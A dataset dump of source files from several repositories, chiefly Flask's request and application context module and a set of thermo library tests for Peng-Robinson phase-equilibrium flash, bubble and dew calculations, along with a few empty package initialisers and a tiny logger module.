repo_name stringlengths 5 100 | ref stringlengths 12 67 | path stringlengths 4 244 | copies stringlengths 1 8 | content stringlengths 0 1.05M ⌀ |
|---|---|---|---|---|
chiefspace/udemy-rest-api | refs/heads/master | udemy_rest_flask1/env/lib/python3.4/site-packages/flask/ctx.py | 170 | # -*- coding: utf-8 -*-
"""
flask.ctx
~~~~~~~~~
Implements the objects required to keep the context.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import sys
from functools import update_wrapper
from werkzeug.exceptions import HTTPException
from .globals import _request_ctx_stack, _app_ctx_stack
from .signals import appcontext_pushed, appcontext_popped
from ._compat import BROKEN_PYPY_CTXMGR_EXIT, reraise
# a singleton sentinel value for parameter defaults
_sentinel = object()
class _AppCtxGlobals(object):
"""A plain object."""
def get(self, name, default=None):
return self.__dict__.get(name, default)
def pop(self, name, default=_sentinel):
if default is _sentinel:
return self.__dict__.pop(name)
else:
return self.__dict__.pop(name, default)
def setdefault(self, name, default=None):
return self.__dict__.setdefault(name, default)
def __contains__(self, item):
return item in self.__dict__
def __iter__(self):
return iter(self.__dict__)
def __repr__(self):
top = _app_ctx_stack.top
if top is not None:
return '<flask.g of %r>' % top.app.name
return object.__repr__(self)
def after_this_request(f):
"""Executes a function after this request. This is useful to modify
response objects. The function is passed the response object and has
to return the same or a new one.
Example::
@app.route('/')
def index():
@after_this_request
def add_header(response):
response.headers['X-Foo'] = 'Parachute'
return response
return 'Hello World!'
This is more useful if a function other than the view function wants to
modify a response. For instance think of a decorator that wants to add
some headers without converting the return value into a response object.
.. versionadded:: 0.9
"""
_request_ctx_stack.top._after_request_functions.append(f)
return f
def copy_current_request_context(f):
"""A helper function that decorates a function to retain the current
request context. This is useful when working with greenlets. The moment
the function is decorated a copy of the request context is created and
then pushed when the function is called.
Example::
import gevent
from flask import copy_current_request_context
@app.route('/')
def index():
@copy_current_request_context
def do_some_work():
# do some work here, it can access flask.request like you
# would otherwise in the view function.
...
gevent.spawn(do_some_work)
return 'Regular response'
.. versionadded:: 0.10
"""
top = _request_ctx_stack.top
if top is None:
raise RuntimeError('This decorator can only be used at local scopes '
'when a request context is on the stack. For instance within '
'view functions.')
reqctx = top.copy()
def wrapper(*args, **kwargs):
with reqctx:
return f(*args, **kwargs)
return update_wrapper(wrapper, f)
def has_request_context():
"""If you have code that wants to test if a request context is there or
not this function can be used. For instance, you may want to take advantage
of request information if the request object is available, but fail
silently if it is unavailable.
::
class User(db.Model):
def __init__(self, username, remote_addr=None):
self.username = username
if remote_addr is None and has_request_context():
remote_addr = request.remote_addr
self.remote_addr = remote_addr
Alternatively you can also just test any of the context bound objects
(such as :class:`request` or :class:`g` for truthness)::
class User(db.Model):
def __init__(self, username, remote_addr=None):
self.username = username
if remote_addr is None and request:
remote_addr = request.remote_addr
self.remote_addr = remote_addr
.. versionadded:: 0.7
"""
return _request_ctx_stack.top is not None
def has_app_context():
"""Works like :func:`has_request_context` but for the application
context. You can also just do a boolean check on the
:data:`current_app` object instead.
.. versionadded:: 0.9
"""
return _app_ctx_stack.top is not None
class AppContext(object):
"""The application context binds an application object implicitly
to the current thread or greenlet, similar to how the
:class:`RequestContext` binds request information. The application
context is also implicitly created if a request context is created
but the application is not on top of the individual application
context.
"""
def __init__(self, app):
self.app = app
self.url_adapter = app.create_url_adapter(None)
self.g = app.app_ctx_globals_class()
# Like request context, app contexts can be pushed multiple times
# but there a basic "refcount" is enough to track them.
self._refcnt = 0
def push(self):
"""Binds the app context to the current context."""
self._refcnt += 1
if hasattr(sys, 'exc_clear'):
sys.exc_clear()
_app_ctx_stack.push(self)
appcontext_pushed.send(self.app)
def pop(self, exc=_sentinel):
"""Pops the app context."""
try:
self._refcnt -= 1
if self._refcnt <= 0:
if exc is _sentinel:
exc = sys.exc_info()[1]
self.app.do_teardown_appcontext(exc)
finally:
rv = _app_ctx_stack.pop()
assert rv is self, 'Popped wrong app context. (%r instead of %r)' \
% (rv, self)
appcontext_popped.send(self.app)
def __enter__(self):
self.push()
return self
def __exit__(self, exc_type, exc_value, tb):
self.pop(exc_value)
if BROKEN_PYPY_CTXMGR_EXIT and exc_type is not None:
reraise(exc_type, exc_value, tb)
class RequestContext(object):
"""The request context contains all request relevant information. It is
created at the beginning of the request and pushed to the
`_request_ctx_stack` and removed at the end of it. It will create the
URL adapter and request object for the WSGI environment provided.
Do not attempt to use this class directly, instead use
:meth:`~flask.Flask.test_request_context` and
:meth:`~flask.Flask.request_context` to create this object.
When the request context is popped, it will evaluate all the
functions registered on the application for teardown execution
(:meth:`~flask.Flask.teardown_request`).
The request context is automatically popped at the end of the request
for you. In debug mode the request context is kept around if
exceptions happen so that interactive debuggers have a chance to
introspect the data. With 0.4 this can also be forced for requests
that did not fail and outside of ``DEBUG`` mode. By setting
``'flask._preserve_context'`` to ``True`` on the WSGI environment the
context will not pop itself at the end of the request. This is used by
the :meth:`~flask.Flask.test_client` for example to implement the
deferred cleanup functionality.
You might find this helpful for unittests where you need the
information from the context local around for a little longer. Make
sure to properly :meth:`~werkzeug.LocalStack.pop` the stack yourself in
that situation, otherwise your unittests will leak memory.
"""
def __init__(self, app, environ, request=None):
self.app = app
if request is None:
request = app.request_class(environ)
self.request = request
self.url_adapter = app.create_url_adapter(self.request)
self.flashes = None
self.session = None
# Request contexts can be pushed multiple times and interleaved with
# other request contexts. Now only if the last level is popped we
# get rid of them. Additionally if an application context is missing
# one is created implicitly so for each level we add this information
self._implicit_app_ctx_stack = []
# indicator if the context was preserved. Next time another context
# is pushed the preserved context is popped.
self.preserved = False
# remembers the exception for pop if there is one in case the context
# preservation kicks in.
self._preserved_exc = None
# Functions that should be executed after the request on the response
# object. These will be called before the regular "after_request"
# functions.
self._after_request_functions = []
self.match_request()
def _get_g(self):
return _app_ctx_stack.top.g
def _set_g(self, value):
_app_ctx_stack.top.g = value
g = property(_get_g, _set_g)
del _get_g, _set_g
def copy(self):
"""Creates a copy of this request context with the same request object.
This can be used to move a request context to a different greenlet.
Because the actual request object is the same this cannot be used to
move a request context to a different thread unless access to the
request object is locked.
.. versionadded:: 0.10
"""
return self.__class__(self.app,
environ=self.request.environ,
request=self.request
)
def match_request(self):
"""Can be overridden by a subclass to hook into the matching
of the request.
"""
try:
url_rule, self.request.view_args = \
self.url_adapter.match(return_rule=True)
self.request.url_rule = url_rule
except HTTPException as e:
self.request.routing_exception = e
def push(self):
"""Binds the request context to the current context."""
# If an exception occurs in debug mode or if context preservation is
# activated under exception situations exactly one context stays
# on the stack. The rationale is that you want to access that
# information under debug situations. However if someone forgets to
# pop that context again we want to make sure that on the next push
# it's invalidated, otherwise we run at risk that something leaks
# memory. This is usually only a problem in test suite since this
# functionality is not active in production environments.
top = _request_ctx_stack.top
if top is not None and top.preserved:
top.pop(top._preserved_exc)
# Before we push the request context we have to ensure that there
# is an application context.
app_ctx = _app_ctx_stack.top
if app_ctx is None or app_ctx.app != self.app:
app_ctx = self.app.app_context()
app_ctx.push()
self._implicit_app_ctx_stack.append(app_ctx)
else:
self._implicit_app_ctx_stack.append(None)
if hasattr(sys, 'exc_clear'):
sys.exc_clear()
_request_ctx_stack.push(self)
# Open the session at the moment that the request context is
# available. This allows a custom open_session method to use the
# request context (e.g. code that access database information
# stored on `g` instead of the appcontext).
self.session = self.app.open_session(self.request)
if self.session is None:
self.session = self.app.make_null_session()
def pop(self, exc=_sentinel):
"""Pops the request context and unbinds it by doing that. This will
also trigger the execution of functions registered by the
:meth:`~flask.Flask.teardown_request` decorator.
.. versionchanged:: 0.9
Added the `exc` argument.
"""
app_ctx = self._implicit_app_ctx_stack.pop()
try:
clear_request = False
if not self._implicit_app_ctx_stack:
self.preserved = False
self._preserved_exc = None
if exc is _sentinel:
exc = sys.exc_info()[1]
self.app.do_teardown_request(exc)
# If this interpreter supports clearing the exception information
# we do that now. This will only go into effect on Python 2.x,
# on 3.x it disappears automatically at the end of the exception
# stack.
if hasattr(sys, 'exc_clear'):
sys.exc_clear()
request_close = getattr(self.request, 'close', None)
if request_close is not None:
request_close()
clear_request = True
finally:
rv = _request_ctx_stack.pop()
# get rid of circular dependencies at the end of the request
# so that we don't require the GC to be active.
if clear_request:
rv.request.environ['werkzeug.request'] = None
# Get rid of the app as well if necessary.
if app_ctx is not None:
app_ctx.pop(exc)
assert rv is self, 'Popped wrong request context. ' \
'(%r instead of %r)' % (rv, self)
def auto_pop(self, exc):
if self.request.environ.get('flask._preserve_context') or \
(exc is not None and self.app.preserve_context_on_exception):
self.preserved = True
self._preserved_exc = exc
else:
self.pop(exc)
def __enter__(self):
self.push()
return self
def __exit__(self, exc_type, exc_value, tb):
# do not pop the request stack if we are in debug mode and an
# exception happened. This will allow the debugger to still
# access the request object in the interactive shell. Furthermore
# the context can be force kept alive for the test client.
# See flask.testing for how this works.
self.auto_pop(exc_value)
if BROKEN_PYPY_CTXMGR_EXIT and exc_type is not None:
reraise(exc_type, exc_value, tb)
def __repr__(self):
return '<%s \'%s\' [%s] of %s>' % (
self.__class__.__name__,
self.request.url,
self.request.method,
self.app.name,
)
|
sriprasanna/django-1.3.1 | refs/heads/master | django/contrib/gis/tests/geo3d/__init__.py | 12133432 | |
michath/ConMonkey | refs/heads/master | python/mozbuild/mozpack/chrome/__init__.py | 12133432 | |
py-geek/City-Air | refs/heads/master | venv/lib/python2.7/site-packages/allauth/socialaccount/providers/openid/migrations/__init__.py | 12133432 | |
sctigercat1/panda3d | refs/heads/master | direct/src/directnotify/LoggerGlobal.py | 12 | """instantiate global Logger object"""
import Logger
defaultLogger = Logger.Logger()
|
apanju/odoo | refs/heads/8.0 | addons/website_instantclick/__init__.py | 12133432 | |
Tejal011089/med2-app | refs/heads/master | selling/doctype/customer_discount/__init__.py | 12133432 | |
alforro/sgpa2015 | refs/heads/master | autenticacion/__init__.py | 12133432 | |
rvmoura96/projeto-almoxarifado | refs/heads/master | myvenv/Lib/site-packages/django/conf/locale/ml/__init__.py | 12133432 | |
CalebBell/thermo | refs/heads/master | tests/test_property_package_eos.py | 1 | # -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2018, Caleb Bell <Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.'''
import numpy as np
from numpy.testing import assert_allclose
import pytest
from thermo.utils import TPD
from thermo.eos import *
from thermo.eos_mix import *
from scipy.misc import derivative
from scipy.optimize import minimize, newton
from math import log, exp, sqrt, log10
from thermo import Mixture
from thermo.property_package import *
from fluids.numerics import linspace, logspace, normalize
from thermo.property_package_constants import (PropertyPackageConstants, PR_PKG)
@pytest.mark.deprecated
def test_bubble_T_PR():
# Copied to VL! Can't get last point to converge.
Ps = np.logspace(np.log10(1e3), np.log10(8e6), 100).tolist()
# Value working for sure!
# A long enough list of points may reveal errors
# Need to check for singularities in results!
# Lagrange multiplier is needed.
T_bubbles_expect = [135.77792634341301, 136.56179975223873, 137.35592304111714, 138.1605125904237, 138.97579118069618, 139.80198815378043, 140.63933971310234, 141.48808915266713, 142.34848716775062, 143.22079210796352, 144.10527026879004, 145.00219623035326, 145.9118531621595, 146.8345331709676, 147.77053765471518, 148.7201776796149, 149.68377437184307, 150.66165932879846, 151.65417505244912, 152.6616753977778, 153.68452605664353, 154.72310505184726, 155.7778032642612, 156.8490249894867, 157.937188514101, 159.04272673536184, 160.16608780166473, 161.30773579673297, 162.46815145564204, 163.64783292476886, 164.84729656230823, 166.06707778415586, 167.30773196086088, 168.56983536585116, 169.8539861804285, 171.16080556094636, 172.49093877035423, 173.84505638241404, 175.22385556194536, 176.6280614293828, 178.058428515323, 179.51574231484207, 181.00082094865053, 182.5145169422077, 184.0577191341151, 185.63135472512306, 187.2363914833706, 188.8738401205766, 190.54475685783353, 192.25024620138348, 193.991463951159, 195.76962046909824, 197.5859842371162, 199.4418857394953, 201.33872170960848, 203.27795978657647, 205.26114363572563, 207.28989859303456, 209.36593790645554, 211.49106965667633, 213.66720445521423, 215.89636403432021, 218.18069086349888, 220.52245895198226, 222.92408602593875, 225.3881473051149, 227.91739114691686, 230.5147568796014, 233.18339521130144, 235.92669168167328, 238.74829372436815, 241.65214202994656, 244.64250705759693, 247.7240317371467, 250.90178165300227, 254.18130431821905, 257.5686995555806, 261.07070353354993, 264.69478970158224, 268.44929079409445, 272.3435473154688, 276.3880896135361, 280.59486299764814, 284.9775086709067, 289.5517180159047, 294.3356847958481, 299.35069043485873, 304.62187400558975, 310.17926492998157, 316.059200210731, 322.3063237832385, 328.97650301847204, 336.14126110695065, 343.8948656757251, 352.36642480869347, 361.7423599546769, 372.31333661508177, 384.5907961800425, 399.6948959805394, 422.0030866468656]
m = Mixture(['CO2', 'n-hexane'], zs=[.5, .5], T=300, P=1E6)
pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
Tcs=m.Tcs, Pcs=m.Pcs, omegas=m.omegas, kijs=[[0,0],[0,0]], eos_kwargs=None)
bubs = []
for P in Ps:
bubs.append(pkg.bubble_T(P, m.zs, maxiter=20, xtol=1e-10, maxiter_initial=20, xtol_initial=1e-1)[-3])
assert_allclose(bubs, T_bubbles_expect, rtol=5e-6)
@pytest.mark.deprecated
def test_PR_four_bubble_dew_cases():
m = Mixture(['furfural', 'furfuryl alcohol'], zs=[.5, .5], T=300, P=1E6)
pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=[235.9, 250.35], Tbs=[434.65, 441.15],
Tcs=[670.0, 632.0], Pcs=[5510000.0, 5350000.0], omegas=[0.4522, 0.734],
kijs=[[0,0],[0,0]], eos_kwargs=None,
HeatCapacityGases=m.HeatCapacityGases)
# Strongly believed to be correct!
assert_allclose(pkg.bubble_T(P=1e6, zs=m.zs)[-3], 539.1838522423355, atol=.1)
assert_allclose(pkg.dew_T(P=1e6, zs=m.zs)[-3], 540.208169750248, atol=.1)
assert_allclose(pkg.dew_P(T=600, zs=m.zs)[-3], 2702616.6490743402, rtol=1e-4)
assert_allclose(pkg.bubble_P(T=600, zs=m.zs)[-3], 2766476.7473238516, rtol=1e-4)
@pytest.mark.deprecated
def test_C1_C10_PT_flash():
m = Mixture(['methane', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9', 'C10'], zs=[.1]*10, T=300, P=1E6)
pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
Tcs=m.Tcs, Pcs=m.Pcs, omegas=m.omegas, kijs=None, eos_kwargs=None)
pkg.flash(m.zs, T=300, P=1e5)
assert_allclose(pkg.V_over_F, 0.3933480636546702, atol=.001)
@pytest.mark.deprecated
def test_ternary_4_flashes_2_algorithms():
zs = [0.8168, 0.1501, 0.0331]
m = Mixture(['n-pentane', 'n-hexane', 'heptane'], zs=zs, T=300, P=1E6)
kijs = [[0, 0.00076, 0.00171], [0.00076, 0, 0.00061], [0.00171, 0.00061, 0]]
Tcs = [469.7, 507.6, 540.2]
Pcs = [3370000.0, 3025000.0, 2740000.0]
omegas = [0.251, 0.2975, 0.3457]
pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
Tcs=Tcs, Pcs=Pcs, omegas=omegas,
kijs=kijs, eos_kwargs=None,
HeatCapacityGases=m.HeatCapacityGases)
# Test the TVF dew and bubble functions
Ts = linspace(160, 473) # Can go up to 474 K in some ones
P_dews = []
P_bubbles = []
P_dews_expect = [0.13546805712060028, 0.43921188284030244, 1.2845937999086763, 3.4284388636658223, 8.432934762206317, 19.28325222813278, 41.304893136512625, 83.4340609062355, 159.8684378673581, 292.0910726014042, 511.22209088685435, 860.6178486961774, 1398.6103635474976, 2201.2649842930023, 3365.0325891826838, 5009.183244809382, 7277.928645001543, 10342.16726173515, 14400.815256785363, 19681.7145007659, 26442.1339934372, 34968.90099430364, 45578.21259245172, 58615.18736373379, 74453.22081253518, 93493.20841630214, 116162.69734460281, 142915.02335020038, 174228.483859415, 210605.5927100339, 252572.45694034494, 300678.3120515243, 355495.2497147813, 417618.1714535647, 487665.00399456796, 566277.2176110205, 654120.6992511221, 751887.0498581398, 860295.4040565268, 980094.9175170006, 1112068.1463153881, 1257035.6798685808, 1415862.6391328266, 1589468.1351378255, 1778839.7877655022, 1985057.6930205086, 2209338.09186709, 2453124.6502311486, 2718322.7103527053, 3008161.494037711]
P_bubbles_expect = [1.6235349125052008, 4.093581157610554, 9.575333470191898, 20.9520396276609, 43.19443917687544, 84.41963574404814, 157.25506477949756, 280.5086157382652, 481.11896195432473, 796.3336480902728, 1276.039624284318, 1985.1548551180522, 3005.982245837768, 4440.428884348238, 6412.003702807469, 9067.523338810985, 12578.476805989876, 17142.0220330821, 22981.609086464254, 30347.244137353322, 39515.42378295007, 50788.78061416531, 64495.487917554194, 80988.47447946836, 100644.50024948097, 123863.1408495057, 151065.7243154966, 182694.25768005836, 219210.37457192744, 261094.32829701997, 308844.0480934111, 362974.2694768574, 424015.74270421825, 492514.5160789749, 569031.2825613177, 654140.7680276675, 748431.1260918825, 852503.2852406674, 966970.1650283068, 1092455.6319079874, 1229592.988381081, 1379022.655075611, 1541388.4595460077, 1717331.4675977635, 1907479.294701055, 2112426.5546414126, 2332696.247164788, 2568654.2410637783, 2820281.571897286, 3086319.669072729]
for T in Ts[2:]:
pkg.flash(T=T, VF=0, zs=zs)
P_bubbles.append(pkg.P)
pkg.flash(T=T, VF=1, zs=zs)
P_dews.append(pkg.P)
assert_allclose(P_bubbles, P_bubbles_expect[2:], rtol=5e-5)
assert_allclose(P_dews, P_dews_expect[2:], rtol=5e-5)
# For each point, solve it as a T problem.
for P, T in zip(P_bubbles, Ts[2:]):
pkg.flash(P=P, VF=0, zs=zs)
assert_allclose(pkg.T, T, rtol=5e-5)
for P, T in zip(P_dews, Ts[2:]):
pkg.flash(P=P, VF=1, zs=zs)
assert_allclose(pkg.T, T, rtol=5e-5)
P_dews_almost = []
P_bubbles_almost = []
for T in Ts[4:]:
# Some convergence issues in sequential_substitution_VL at lower pressures
pkg.flash(T=T, VF=0+1e-9, zs=zs)
P_bubbles_almost.append(pkg.P)
pkg.flash(T=T, VF=1-1e-9, zs=zs)
P_dews_almost.append(pkg.P)
assert_allclose(P_bubbles[2:], P_bubbles_almost, rtol=5e-5)
assert_allclose(P_dews[2:], P_dews_almost, rtol=5e-5)
# Some points fail here too!
for P, T in zip(P_dews_expect[4:-1], Ts[4:-1]):
pkg.flash(P=P, VF=1-1e-9, zs=zs)
assert_allclose(P, pkg.P)
for P, T in zip(P_bubbles_expect[2:-2], Ts[2:-2]):
pkg.flash(P=P, VF=0+1e-9, zs=zs)
assert_allclose(P, pkg.P)
@pytest.mark.deprecated
@pytest.mark.slow
def test_PVF_parametric_binary_vs_CoolProp():
import CoolProp.CoolProp as CP
zs = [0.4, 0.6]
m = Mixture(['Ethane', 'Heptane'], zs=zs, T=300, P=1E6)
kij = .0067
kijs = [[0,kij],[kij,0]]
Tcs = [305.322, 540.13]
Pcs = [4872200.0, 2736000.0]
omegas = [0.099, 0.349]
c1, c2 = PRMIX.c1, PRMIX.c2
PRMIX.c1, PRMIX.c2 = 0.45724, 0.07780
pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
Tcs=Tcs, Pcs=Pcs, omegas=omegas,
kijs=kijs, eos_kwargs=None,
HeatCapacityGases=m.HeatCapacityGases)
pkg.FLASH_VF_TOL = 1e-12
AS = CP.AbstractState("PR", "Ethane&Heptane")
AS.set_mole_fractions(zs)
AS.set_binary_interaction_double(0,1,"kij", kij)
Ps = [10, 100, 1000, 1e4, 5e4, 1e5, 5e5, 1e6, 2e6]
for P in Ps:
# Up above 2e6, issues arise in thermo
VFs = linspace(0, 1)
CP_Ts = []
Ts_calc = []
for VF in VFs:
try:
AS.update(CP.PQ_INPUTS, P, VF);
CP_Ts.append(AS.T())
pkg.flash(VF=VF, P=P, zs=zs)
Ts_calc.append(pkg.T)
except Exception as e:
print(VF, e)
# print(CP_Ts/np.array(Ts_calc))
# the low pressure and highest pressure regions are the greatest errors
# can go down to 1e-6 tol for all, most are 1e-12
assert_allclose(CP_Ts, Ts_calc, rtol=1e-5)
PRMIX.c1, PRMIX.c2 = c1, c2
@pytest.mark.deprecated
@pytest.mark.slow
def test_PVF_parametric_binary_zs_vs_CoolProp():
'''More advanced test of the above. Changes mole fractions.
To get more errors, reduce the mole fractions; and wide the P range.
'''
import CoolProp.CoolProp as CP
zs = [0.4, 0.6]
m = Mixture(['Ethane', 'Heptane'], zs=zs, T=300, P=1E6)
kij = .0067
kijs = [[0,kij],[kij,0]]
Tcs = [305.322, 540.13]
Pcs = [4872200.0, 2736000.0]
omegas = [0.099, 0.349]
c1, c2 = PRMIX.c1, PRMIX.c2
PRMIX.c1, PRMIX.c2 = 0.45724, 0.07780
pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
Tcs=Tcs, Pcs=Pcs, omegas=omegas,
kijs=kijs, eos_kwargs=None,
HeatCapacityGases=m.HeatCapacityGases)
pkg.FLASH_VF_TOL = 1e-12
AS = CP.AbstractState("PR", "Ethane&Heptane")
AS.set_binary_interaction_double(0,1,"kij", kij)
zis = linspace(.01, .98, 5)
for zi in zis:
zs = [1-zi, zi]
Ps = [100, 1000, 1e4, 5e4, 1e5, 5e5, 1e6]
for P in Ps:
# Up above 2e6, issues arise in thermo
VFs = linspace(0, 1)
CP_Ts = []
Ts_calc = []
for VF in VFs:
try:
AS.set_mole_fractions(zs)
AS.update(CP.PQ_INPUTS, P, VF);
CP_Ts.append(AS.T())
pkg.flash(VF=VF, P=P, zs=zs)
Ts_calc.append(pkg.T)
except Exception as e:
print(zi, P, VF, e)
# try:
# print(CP_Ts/np.array(Ts_calc))
# except:
# print('bad shape')
assert_allclose(CP_Ts, Ts_calc, rtol=1e-5)
PRMIX.c1, PRMIX.c2 = c1, c2
@pytest.mark.deprecated
@pytest.mark.xfail
def test_failing_sequential_subs():
zs = [0.8168, 0.1501, 0.0331]
m = Mixture(['n-pentane', 'n-hexane', 'heptane'], zs=zs, T=300, P=1E6)
kijs = [[0, 0.00076, 0.00171], [0.00076, 0, 0.00061], [0.00171, 0.00061, 0]]
Tcs = [469.7, 507.6, 540.2]
Pcs = [3370000.0, 3025000.0, 2740000.0]
omegas = [0.251, 0.2975, 0.3457]
pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
Tcs=Tcs, Pcs=Pcs, omegas=omegas,
kijs=kijs, eos_kwargs=None,
HeatCapacityGases=m.HeatCapacityGases)
pkg.to_TP_zs(T=180, P=4, zs=zs).sequential_substitution_VL(maxiter=10,xtol=1E-7)
@pytest.mark.deprecated
def test_PRMIX_pkg_H():
zs = [0.4, 0.6]
m = Mixture(['Ethane', 'Heptane'], zs=zs, T=300, P=1E6)
kij = .0
kijs = [[0,kij],[kij,0]]
Tcs = [305.322, 540.13]
Pcs = [4872200.0, 2736000.0]
omegas = [0.099, 0.349]
pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
Tcs=Tcs, Pcs=Pcs, omegas=omegas,
kijs=kijs, eos_kwargs=None,
HeatCapacityGases=m.HeatCapacityGases)
pkg.FLASH_VF_TOL = 1e-12
# Case gas -gas pressure difference
pkg.flash(T=450, P=400, zs=m.zs)
H1 = pkg.Hm
assert pkg.phase == 'g'
pkg.flash(T=450, P=1e6, zs=m.zs)
H2 = pkg.Hm
assert pkg.phase == 'g'
assert_allclose(H1 - H2, 1638.19303081, rtol=1e-3)
# Case gas to VF= = 0 at same T
pkg.flash(T=350, P=400, zs=m.zs)
assert pkg.phase == 'g'
H1 = pkg.Hm
pkg.flash(T=350, VF=.5, zs=m.zs)
assert pkg.phase == 'l/g'
H2 = pkg.Hm
assert_allclose(H1 - H2, 16445.143155, rtol=1e-3)
# Higher pressure, less matching (gas constant diff probably; gas-liquid difference! No partial phase.)
pkg.flash(T=450, P=400, zs=m.zs)
assert pkg.phase == 'g'
H1 = pkg.Hm
pkg.flash(T=450, P=1e8, zs=m.zs)
assert pkg.phase == 'l'
H2 = pkg.Hm
H1 - H2
assert_allclose(H1 - H2, 13815.6666172, rtol=1e-3)
# low P fluid to saturation pressure (both gas)
pkg.flash(T=450, P=400, zs=m.zs)
assert pkg.phase == 'g'
H1 = pkg.Hm
H1 = pkg.Hm
pkg.flash(T=450, VF=1, zs=m.zs)
assert pkg.phase == 'g'
H2 = pkg.Hm
H2 = pkg.Hm
assert_allclose(H1 - H2, 2003.84468984, rtol=1e-3)
# low pressure gas to liquid saturated
pkg.flash(T=350, P=400, zs=m.zs)
assert pkg.phase == 'g'
H1 = pkg.Hm
pkg.flash(T=350, VF=0, zs=m.zs)
assert pkg.phase == 'l'
H2 = pkg.Hm
assert_allclose(H1 - H2, 23682.3468207, rtol=1e-3)
# High pressure liquid to partial evaporation
pkg.flash(T=350, P=3e6, zs=m.zs)
assert pkg.phase == 'l'
H1 = pkg.Hm
pkg.flash(T=350, VF=.25, zs=m.zs)
assert pkg.phase == 'l/g'
H2 = pkg.Hm
assert_allclose(H1 - H2, -2328.21259061, rtol=1e-3)
# High pressure temperature change
pkg.flash(T=300, P=3e6, zs=m.zs)
assert pkg.phase == 'l'
H1 = pkg.Hm
pkg.flash(T=400, P=1e7, zs=m.zs)
assert pkg.phase == 'l'
H2 = pkg.Hm
assert_allclose(H1 - H2, -18470.2994798, rtol=1e-3)
# High pressure temperature change and phase change
pkg.flash(T=300, P=3e6, zs=m.zs)
assert pkg.phase == 'l'
H1 = pkg.Hm
pkg.flash(T=400, P=1e5, zs=m.zs)
assert pkg.phase == 'g'
H2 = pkg.Hm
H1 - H2
assert_allclose(H1 - H2, -39430.7145672, rtol=1e-3)
@pytest.mark.deprecated
def test_PRMIX_pkg_S():
zs = [0.4, 0.6]
m = Mixture(['Ethane', 'Heptane'], zs=zs, T=300, P=1E6)
kij = .0
kijs = [[0,kij],[kij,0]]
Tcs = [305.322, 540.13]
Pcs = [4872200.0, 2736000.0]
omegas = [0.099, 0.349]
pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
Tcs=Tcs, Pcs=Pcs, omegas=omegas,
kijs=kijs, eos_kwargs=None,
HeatCapacityGases=m.HeatCapacityGases)
pkg.FLASH_VF_TOL = 1e-12
# Case gas -gas pressure difference
pkg.flash(T=450, P=400, zs=m.zs)
S1 = pkg.Sm
assert pkg.phase == 'g'
pkg.flash(T=450, P=1e6, zs=m.zs)
S2 = pkg.Sm
assert pkg.phase == 'g'
assert_allclose(S1 - S2, 67.59095157604824, rtol=1e-3)
# Case gas to VF= = 0 at same T
pkg.flash(T=350, P=400, zs=m.zs)
assert pkg.phase == 'g'
S1 = pkg.Sm
pkg.flash(T=350, VF=.5, zs=m.zs)
assert pkg.phase == 'l/g'
S2 = pkg.Sm
assert_allclose(S1 - S2, 96.84959621651315, rtol=1e-3)
# Higher pressure, less matching (gas constant diff probably; gas-liquid difference! No partial phase.)
pkg.flash(T=450, P=400, zs=m.zs)
assert pkg.phase == 'g'
S1 = pkg.Sm
pkg.flash(T=450, P=1e8, zs=m.zs)
assert pkg.phase == 'l'
S2 = pkg.Sm
S1 - S2
assert_allclose(S1 - S2, 128.67194096593366, rtol=1e-3)
# low P fluid to saturation pressure (both gas)
pkg.flash(T=450, P=400, zs=m.zs)
assert pkg.phase == 'g'
H1 = pkg.Hm
S1 = pkg.Sm
pkg.flash(T=450, VF=1, zs=m.zs)
assert pkg.phase == 'g'
H2 = pkg.Hm
S2 = pkg.Sm
assert_allclose(S1 - S2, 69.64345358808025, rtol=1e-3)
# low pressure gas to liquid saturated
pkg.flash(T=350, P=400, zs=m.zs)
assert pkg.phase == 'g'
S1 = pkg.Sm
pkg.flash(T=350, VF=0, zs=m.zs)
assert pkg.phase == 'l'
S2 = pkg.Sm
assert_allclose(S1 - S2, 124.44419797042649, rtol=1e-3)
# High pressure liquid to partial evaporation
pkg.flash(T=350, P=3e6, zs=m.zs)
assert pkg.phase == 'l'
S1 = pkg.Sm
pkg.flash(T=350, VF=.25, zs=m.zs)
assert pkg.phase == 'l/g'
S2 = pkg.Sm
assert_allclose(S1 - S2, -7.913399921816193, rtol=1e-3)
# High pressure temperature change
pkg.flash(T=300, P=3e6, zs=m.zs)
assert pkg.phase == 'l'
S1 = pkg.Sm
pkg.flash(T=400, P=1e7, zs=m.zs)
assert pkg.phase == 'l'
S2 = pkg.Sm
